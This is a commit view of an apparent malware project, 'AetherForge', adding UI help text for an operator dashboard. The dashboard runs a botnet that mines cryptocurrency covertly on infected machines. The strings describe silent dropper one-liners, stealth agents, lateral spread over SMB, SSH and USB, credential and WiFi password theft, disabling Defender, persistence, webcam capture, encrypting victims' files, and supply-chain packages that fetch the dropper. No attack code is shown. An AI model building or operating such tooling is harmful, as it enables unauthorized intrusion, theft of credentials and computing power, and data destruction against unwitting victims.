Release validation: tests green, USB pack, fleet UX and API hardening.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled

Fix macOS agent cross-compile (SilentAVExclusion) and Calibrate E2E nav selector; expand tests and docs; refresh portable usb binary and spread/wiki assets.
This commit is contained in:
AetherForge
2026-06-06 16:57:39 -07:00
parent 5229854f00
commit 415b5dc6a3
119 changed files with 7005 additions and 3082 deletions

View File

@@ -0,0 +1,163 @@
/** Inline help for dashboard, crucible, fleet, build manager, and other operator UI — not forge/calibrate form fields. */
export const UI_HELP: Record<string, string> = {
dash_fleet_health:
'Composite score from online ratio, accept rate, and hashrate activity. Green means the fleet is mining normally; amber or red flags nodes to check on Crucible.',
dash_install_funnel:
'Shows how many agents connected in the last 7 days, grouped by forged build. USB column counts agents that arrived via USB spread.',
dash_operator_audit:
'Server-side log of operator actions (logins, forge, remote commands). Last 50 entries; refreshes every minute.',
dash_signal_locked:
'Live WebSocket link to the control server. When reconnecting, fleet stats may be stale until the signal locks again.',
dash_advanced_mode:
'Overview hides extra charts, topology, pool status, and the raw matrix stream. Advanced shows the full telemetry deck.',
dash_raw_stream:
'Full-screen scrolling dump of live WebSocket traffic — useful for debugging agent messages, not day-to-day monitoring.',
dash_fleet_hash:
'Sum of 15-minute average hashrate across all online Monero (RandomX) miners in the fleet.',
dash_est_daily:
'Rough USD/day from live fleet hashrate and the cached XMR price. Connect a wallet on Calibrate for pool-reported earnings instead.',
dash_accept_rate:
'Percentage of submitted shares accepted by the pool. Below ~95% often means bad pool connectivity or misconfigured workers.',
dash_nodes_live:
'Online agents with an active WebSocket heartbeat versus total registered agents (including offline).',
dash_fleet_pipeline:
'Setup checklist: forged build exists → agent deployed → node online → hashrate flowing → shares reaching the pool.',
dash_pool_stratum:
'Upstream pool connections from this control server. LIVE = stratum connected; DEGRADED or DOWN means payout risk.',
dash_ai_activity:
'Agents with AI Autonomy enabled ask Ollama on this PC for self-healing decisions. Empty until a forged miner reports in.',
dash_gpu_rvn:
'Ravencoin KawPoW GPU miners detected on online agents. Separate from Monero CPU hashrate above.',
dash_xmr_section:
'Monero RandomX CPU mining stats for the fleet. GPU Ravencoin rigs appear in the RVN section below when active.',
crucible_node_roster:
'Every registered agent. Click to select; badges show SSH reachability, security posture, patches, and resource pressure.',
crucible_heat_map:
'Spatial view of node selection and group colors. Click a dot to toggle that agent in the roster.',
crucible_groups:
'Named color groups shared with Fleet Roster. Click a group chip to select all members for bulk commands.',
crucible_active_target:
'The focused node when exactly one is selected — used for single-agent panels like live desktop and file browser.',
crucible_tab_ops:
'Day-to-day remote control: pause/resume mining, shell commands, agent restart, logs, and power actions.',
crucible_tab_recon:
'Intelligence gathering: posture scans, full system audit, screenshots, camera list, and network discovery.',
crucible_tab_files:
'Browse, upload, download, and encrypt files on the selected online agent via the remote file browser.',
crucible_tab_spread:
'Lateral movement and propagation: spread-now, SMB shares, credential vault, and secure wipe.',
crucible_tab_tunnels:
'SSH port forwards and protocol tunnels between your control PC and selected agents.',
crucible_mining_ops:
'Pause or resume hashing on selected online nodes. The agent process stays connected — only the miner thread stops or starts.',
crucible_resume:
'Tell selected online miners to resume hashing after a pause command or idle throttle.',
crucible_pause:
'Pause mining on selected nodes without stopping the agent process — they stay connected.',
crucible_full_audit:
'Deep posture scan (3060s): firewall, WAN IP, geo, DNS, ARP, subnet scan, hardware, and listeners.',
crucible_posture_badge:
'Quick security summary from the last heartbeat: AV, firewall, SSH, elevation, and patch state.',
crucible_master_terminal:
'Command output and errors from bulk ops stream here. Green lines succeeded; red lines failed.',
crucible_section_agent:
'Restart, fetch logs, kill, or fully uninstall the agent process on selected nodes.',
crucible_section_system:
'OS-level power actions — reboot or shutdown the whole machine, not just the miner.',
crucible_section_persistence:
'BITS jobs, host-binary hijack, and read-only persistence audits for surviving reboots.',
crucible_section_maintenance:
'Fleet upgrades, wake-on-LAN, registry read/write, and remote process kill by PID.',
crucible_section_intel:
'One-click intel pulls: screenshot, processes, netstat, clipboard, WiFi creds, and more.',
crucible_section_security:
'Post-exploit posture changes — disable Defender or dump saved WiFi passwords.',
crucible_section_network:
'Connectivity probes, listener tables, patch status, ARP neighbors, and firewall controls.',
crucible_section_media:
'Live desktop polling, camera enumeration, and per-device webcam snapshots.',
crucible_section_files_quick:
'Push files to Desktop or a custom path, or pull a remote file into the terminal.',
crucible_section_files_advanced:
'Delete, move, or secure-wipe paths on selected agents — confirm before destructive ops.',
crucible_section_destructive:
'SYS CRYPT encrypts Documents/home — irreversible without the key.',
crucible_section_spread:
'On-demand lateral spread, subnet discovery, SMB shares, and credential vault names.',
crucible_section_seek:
'SUPP Seek recursively seeds media folders with silent launcher stubs (Windows + Mac/Linux).',
crucible_section_ssh:
'Probe or wake OpenSSH on Windows nodes, plus a quick reference for direct and tunneled SSH.',
crucible_section_tunnels:
'WAN IP, UPnP hole punch, Cloudflare outbound tunnels, mesh peers, and tunnel stop.',
crucible_section_protocol_tunnel:
'Full protocol tunnel panel for the focused node — cloudflared, SSH forwards, and live status.',
crucible_section_portfwd:
'Matrix of SSH local-forward rules pushed to selected Windows agents.',
bm_pin_dropper:
'Pinned build is served by unauthenticated dropper URLs (install.ps1 / install.sh). Only one build can be pinned at a time.',
bm_public_build:
'Public builds appear on the login page download list without signing in — useful for LAN handoffs.',
bm_dropper_oneliner:
'One-liner scripts download and silently install the pinned build (or latest if none pinned) from this server.',
bm_reforge:
'Open Forge with this build\'s settings pre-filled so you can tweak and compile a new revision.',
bm_platform_badge:
'Target OS baked into the installer: Windows, Linux, macOS, or Universal (multi-OS ZIP).',
fm_remote_browse:
'Live directory listing on the selected agent. Double-click folders to navigate; select files to download or preview text.',
fm_upload:
'Push a file from your browser to the agent. Set destination path or defaults to current folder + filename.',
fm_encrypt_path:
'AES-256-GCM encrypt every file at the current path. Irreversible without the key — requires Remote Aggressive Ops.',
pt_path_tracer:
'On-demand multi-hop WireGuard VPN through up to 3 Windows agents. Scan the QR or import the .conf on your phone.',
pt_agent_chain:
'Pick agents in order — traffic hops through each node. Windows only; max 3 hops. Click TRACE to orchestrate tunnels.',
fleet_runtime_policy:
'Push live mining policy (schedule, CPU cap, optional pool override) to online agents without re-forging.',
fleet_runtime_modules:
'Hot-load optional agent modules (e.g. crucible ops pack) onto connected workers.',
spread_funnel_widget:
'Campaign install funnel: page hits → downloads → first beacon → mining, per ?c= slug. See Emberwake for full war room.',
md_overview:
'Fast path to a forged agent: pick Ghost, Loud, or Spread, optionally layer a spread profile, then one click builds and exports a kit when needed. Copy install commands from Builds; track campaigns in Emberwake; use Forge when you need every option.',
md_operation_chip:
'Ghost = stealth worker for quiet LAN installs. Loud = visible logs for lab testing. Spread = universal kit with USB/LAN autospread — pair with a spread profile on the right.',
md_spread_profile:
'Optional deliverable shape on top of your operation chip — e.g. LAN Kindling adds SMB/SSH spread flags, Desktop Fusion enables media fusion packaging.',
md_campaign_identity:
'Campaign slug tags every link with ?c= so Emberwake can group hits and beacons. Worker name, control URL, and wallet are the only identity fields you need here.',
md_strike_pipeline:
'One automated run: lock presets → compile the agent → export spread-kit ZIP when the loadout requires it. Install commands live on Builds after the run finishes.',
md_equip_strike:
'Starts the pipeline using your equipped loadout. Fix wallet or control URL errors before clicking; grab install one-liners from Builds when done.',
ew_overview:
'Spread desk after you forge: tag install links with ?c=, export lure kits, and read campaign funnels. Forge agents on Mission Deck (fast) or Forge (full control).',
ew_campaign_setup:
'Shared settings for every Emberwake export on this page. Campaign slug tags telemetry; pinned build selects which forged agent gets installed.',
ew_campaign_slug:
'Short name appended as ?c= on dropper and download URLs. War Room groups hits, downloads, beacons, and hashrate by this slug.',
ew_install_links:
'Per-platform install one-liners live in Builds. Pin a build there, then copy PowerShell / bash / download URLs for remote deploy.',
ew_spread_kit:
'Downloads a ZIP of spread-kit templates (README, Deploy scripts, lander assets) with your server URL and campaign slug baked in.',
ew_war_room:
'Live funnel per campaign: page hits → downloads → first agent beacon → mining nodes and fleet hashrate. Updates every 15s and on WebSocket push.',
ew_supply_chain:
'Advanced: export a WordPress plugin ZIP or npm package template that pulls your dropper on install. Uses campaign settings above.',
ew_public_urls:
'Direct /api/v1/public/download links for each build — same files shown on the login page when a build is marked public.',
ew_techniques:
'Index of spread vectors with links into the tabbed Spread Techniques playbook. Emberwake handles actions; the playbook has step-by-step how-to.',
ew_shared_notes:
'Collaborative scratchpad synced to every logged-in operator. Use for lure copy, host paths, or rotation notes — not stored on agents.',
};